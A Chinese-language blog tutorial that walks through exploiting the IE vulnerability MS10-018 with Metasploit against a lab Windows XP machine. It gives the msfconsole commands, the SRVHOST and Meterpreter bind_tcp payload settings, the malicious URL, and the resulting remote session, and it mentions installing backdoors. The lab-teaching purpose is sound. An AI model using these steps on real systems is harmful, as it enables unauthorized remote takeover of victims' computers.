漏洞ms10-018利用及演示
今天我们不学C(刚刚发布两个文章),来看看ie浏览器的漏洞及利用。
我们用到的工具有:
1.蓄势待发的小白一枚
2.一台Linux主机(如kali,我演示所用到的是manjaro,添加了black arch的源,具体怎么添加,我以后会有文章讲,也可以去网上查一查哦)
3.一台xp主机
好了,这些准备好了之后,我们所需要的工具是大名鼎鼎的msfconsole,如果你直接pacman肯定是没有的,那么我们要怎么做呢?
首先是用pacman搜索一下
pacman -Ss msf
其他的不用管,我们用到的就是msfdb(据说是black arch定制版)于是pacman下来:
sudo pacman -S msfdb
在漫长的等待之后只要不报错就装好了,接下来在终端输入命令启动工具:
msfconsole
看到如下画面就说明启动完成啦!(图案可能不一样,这是每次启动都会变的)
这次利用的漏洞是ms10-018,于是,我们来搜索一下所需的模块
search ms10-018
可以看到我们找到了两个模块,第一个就是我们要用到的啦,第2个我们先不用管输入如下命令启用模块
use 0
然后,我们查看一下所需要配置的参数
options
这里可以看到对哪些版本的Windows及ie有效。再往上我们可以找到SRVHOST这个参数需要配置
这是用来配置我们的攻击方主机IP的,我们可以输入
ifconfig
来查看本机的网络配置
然后输入
msf6 exploit(windows/browser/ms10_018_ie_behaviors) > set SRVHOST 192.168.117.130(你IP)
SRVHOST => 192.168.117.130
msf6 exploit(windows/browser/ms10_018_ie_behaviors) >
再来设置攻击载荷:
msf6 exploit(windows/browser/ms10_018_ie_behaviors) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/browser/ms10_018_ie_behaviors) >
然后设置端口:
msf6 exploit(windows/browser/ms10_018_ie_behaviors) > set LPORT 8888
LPORT => 8888
msf6 exploit(windows/browser/ms10_018_ie_behaviors) >
现在就设置完成啦,可以跑一下看看
msf6 exploit(windows/browser/ms10_018_ie_behaviors) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Using URL: http://192.168.117.130:8080/efVGZz6RTIz8Yb
[*] Server started.
msf6 exploit(windows/browser/ms10_018_ie_behaviors) >
可以看到我们这里有一个链接
由于是演示,所以我们就不做伪装,端口转发啊等等复杂的东西了,直接复制下来,再在xp上打开ie,输入链接。
在输入完成后ie应该是会闪退(也可能没有),都无伤大雅,再转到manjaro(攻击主机)
出现如下画面就证明成功啦!我们回车确认再去寻找会话:
sessions
msf6 exploit(windows/browser/ms10_018_ie_behaviors) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows XP\hello @ XP 0.0.0.0:0 -> 192.168.117.136:8888 (192.168.117.136)
msf6 exploit(windows/browser/ms10_018_ie_behaviors) >
可以看到有一个会话,我们建立连接试一下:
sessions -i 1
可以看到,成功了,接下来你就有了这台xp的较高权限我们可以pwd查看位置,mkdar创建个文件夹等等,也可以装个后门之类的,在此不做演示。
既然你已经看到这了,那么点个赞,关注一下再走吧!